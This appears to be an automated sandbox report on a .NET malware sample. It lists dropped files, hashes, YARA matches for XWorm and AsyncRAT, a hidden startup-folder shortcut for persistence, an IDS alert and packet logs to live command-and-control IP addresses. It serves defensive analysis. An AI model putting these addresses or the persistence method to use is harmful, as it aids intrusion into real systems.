MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_brnwyzyn.tpv.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cuq2bxmg.oo1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jkat1zxr.vdv.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jzjrtcj4.r3o.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ljtmhhaa.jwl.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nkijes3r.1xr.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ogljnoyt.xzm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_phgzwgtn.bj3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ssovggd5.sy2.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_td3mgzln.hsr.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xnrbtkd2.esq.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\btjxg.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	152064
Entropy (8bit):	5.677434375511732
Encrypted:	false
SSDEEP:	1536:RQuj357A7FK9fYP063O+xrBOybBYfOS4J+1oEhyiHn:quj5wFK9fYPJO+XtYmS4g+Ehfn
MD5:	2649EF15CF6004B05C80ABD825CD594E
SHA1:	2593CB7DB276D90D51EA5235EB4C14CBD8ECD5A5
SHA-256:	E6F7963C726231571294A06E1E8B1F03B87684CAD8383BB194B957FC685685C2
SHA-512:	3B1367D52CB5F99BCE35FEE1D6414DE92A9F10E8DF6DFD27C6872E5C4783EBA9BD0ED5A6D645FD93B81A064F46A00E25FA6D8404E2881F3006F8B04F2AD67DDC
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\btjxg.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\btjxg.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\btjxg.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f..f................................. ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc...............P..............@..B........................H........X..4[............................................................(......(.....s.........s.........s.........s............0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0............(....(.....+......0...........(.....+....0...............(.....+....0...........(.....+....0................-.(...+.+.+...+...0...........................(.....0.. .......~.........-.(...+.....~.....+....(.....0..

C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe

Download File

Process:	C:\Users\user\Desktop\9NBx4Vmiuj.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	646656
Entropy (8bit):	7.996473399806526
Encrypted:	true
SSDEEP:	12288:uJz1yun32ZOxhr9d6G3R6dYw02suri2zUkhqCFl6oXK1CC+:aByM3b9oM6dl0NulFhqCWwW8
MD5:	1D562EAA3E33451A40F60C976C6F4BC0
SHA1:	DE0F3E027E12162388EC953936857F06B71487CA
SHA-256:	DDE68755FA515158E01E3E8F2B90772DC86E25B7E2684FC5066A5E33EE22B614
SHA-512:	73901625A5F7A9FECD013D4675427D4BD2D623174E8C78A4C831D4CA76797312B67F75FB662F2BD091DDEB4DD3B20790A39EB237C9F57C4E6A2C88A8B0AF042A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.../............."...0.................. .....@..... ....................... ............`...@......@............... ..................................t...........................p,............................................................... ..H............text...H.... ...................... ..`.rsrc...t...........................@..@........................................H.......D!..,............................................................0.......... .........%.....(....s................o....&..(.......s..................o....&..(...+(...+(........r...po......."...(......rM..p(..........o....&...,..o......,..o..............<.X....................~......(....Vs....(....t............BSJB............v4.0.30319......l...t...#~..........#Strings........d...#US.<.......#GUID...L.......#Blob...........W..!.......3........&...........................

C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\9NBx4Vmiuj.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\btjxg.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\btjxg.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 26 16:24:19 2024, mtime=Tue Mar 26 16:24:19 2024, atime=Tue Mar 26 16:24:19 2024, length=152064, window=hide
Category:	dropped
Size (bytes):	651
Entropy (8bit):	4.599558783679575
Encrypted:	false
SSDEEP:	6:4xtQlXeojjCqcyYrzcgiX+WKbhEtHEpuNRQvL+7tuIljAl6l/WoxN8bhEZi7NuE9:8pXqcyyzWOeCu7ML+MYjA8x+bX3GRmV
MD5:	F1118C6ECEC4704A2787814E63595346
SHA1:	9FA83F7DC1A3907F90B42007B86D5B755439030B
SHA-256:	064151B0245CA9699D4C066867DF6FD720D3108592D87613295960BDB1055320
SHA-512:	148B4E5B1983E07937D5BDD2BDC276E5D03C44879BBBBCCF682870F1C474431B99F797A6E9129F4C74A19C8E93F131F526B01772F9E063D24498DBCF6E4CE972
Malicious:	false
Preview:	L..................F.... ..x..o....x..o....x..o.....R...........................P.O. .:i.....+00.../C:\...................`.1.....zX... PROGRA~3..H......O.IzX......g......................~..P.r.o.g.r.a.m.D.a.t.a.....\.2..R..zX.. btjxg.exe.D......zX..zX.............................9(.b.t.j.x.g...e.x.e.......G...............-.......F............P......C:\ProgramData\btjxg.exe..0.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.b.t.j.x.g...e.x.e.`.......X.......301389...........hT..CrF.f4... ._^......,...W..hT..CrF.f4... ._^......,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.996473399806526
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	9NBx4Vmiuj.exe
File size:	646'656 bytes
MD5:	1d562eaa3e33451a40f60c976c6f4bc0
SHA1:	de0f3e027e12162388ec953936857f06b71487ca
SHA256:	dde68755fa515158e01e3e8f2b90772dc86e25b7e2684fc5066a5e33ee22b614
SHA512:	73901625a5f7a9fecd013d4675427d4bd2d623174e8c78a4c831d4ca76797312b67f75fb662f2bd091ddeb4dd3b20790a39eb237c9f57c4e6a2c88a8b0af042a
SSDEEP:	12288:uJz1yun32ZOxhr9d6G3R6dYw02suri2zUkhqCFl6oXK1CC+:aByM3b9oM6dl0NulFhqCWwW8
TLSH:	C7D42359DAE458CBEAA22AF300545714B856963D91F233AB5964C0A4F92604CF3FCB3F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.../............."...0.................. .....@..... ....................... ............`...@......@............... .....

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x140000000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xE589AE2F [Sat Jan 12 19:44:47 2092 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa0000	0x574	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2c70	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x9d548	0x9d600	4a7bb818f205ed83d75fef014d75e6dd	False	0.9931260549046863	data	7.997404824515428	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xa0000	0x574	0x600	f9042f36b921a51c680925d06f022a2e	False	0.4010416666666667	data	3.943828323234577	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xa0090	0x2e4	data			0.4297297297297297
RT_MANIFEST	0xa0384	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
03/26/24-18:25:18.899869	TCP	2852870	ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes	8081	49797	157.254.223.19	192.168.2.5

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 26, 2024 18:23:13.766839981 CET	49726	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:13.953573942 CET	39001	49726	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:13.953665018 CET	49726	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:15.072678089 CET	49726	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:15.300309896 CET	39001	49726	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:15.300426006 CET	49726	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:15.511081934 CET	39001	49726	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:15.552865982 CET	49726	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:15.739442110 CET	39001	49726	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:15.752429962 CET	49726	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:15.866852045 CET	49727	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:15.878387928 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:15.939066887 CET	39001	49726	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:15.939308882 CET	39001	49726	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:15.939392090 CET	49726	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.053730011 CET	39001	49727	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.053821087 CET	49727	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.064969063 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.065035105 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.066544056 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.087186098 CET	49727	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.254343987 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.254375935 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.254420996 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.254439116 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.254455090 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.254483938 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.254492998 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.254499912 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.254565954 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.254582882 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.254621029 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.254641056 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.254663944 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.254673004 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.254725933 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.316078901 CET	39001	49727	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.316131115 CET	49727	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.441049099 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.441072941 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.441091061 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.441112041 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.441128969 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.441162109 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.441164017 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.441164017 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.441179037 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.441199064 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.441203117 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.441246986 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.441279888 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.441298962 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.441315889 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.441332102 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.441348076 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.441359043 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.441364050 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.441375017 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.441380978 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.441400051 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.441402912 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.441436052 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.441446066 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.441467047 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.441483974 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.441514015 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.441528082 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.441553116 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.523914099 CET	39001	49727	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.568505049 CET	49727	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.627718925 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.627753019 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.627767086 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.627785921 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.627800941 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.627818108 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.627826929 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.627836943 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.627854109 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.627870083 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.627881050 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.627916098 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.627932072 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.627949953 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.627964973 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.627975941 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.628000021 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.628004074 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.628019094 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.628031969 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.628060102 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.628081083 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.628129005 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.628166914 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.628169060 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.628226042 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.628241062 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.628272057 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.628281116 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.628289938 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.628314018 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.628330946 CET	80	49728	185.196.10.233	192.168.2.5
Mar 26, 2024 18:23:16.628355026 CET	49728	80	192.168.2.5	185.196.10.233
Mar 26, 2024 18:23:16.628380060 CET	80	49728	185.196.10.233	192.168.2.5
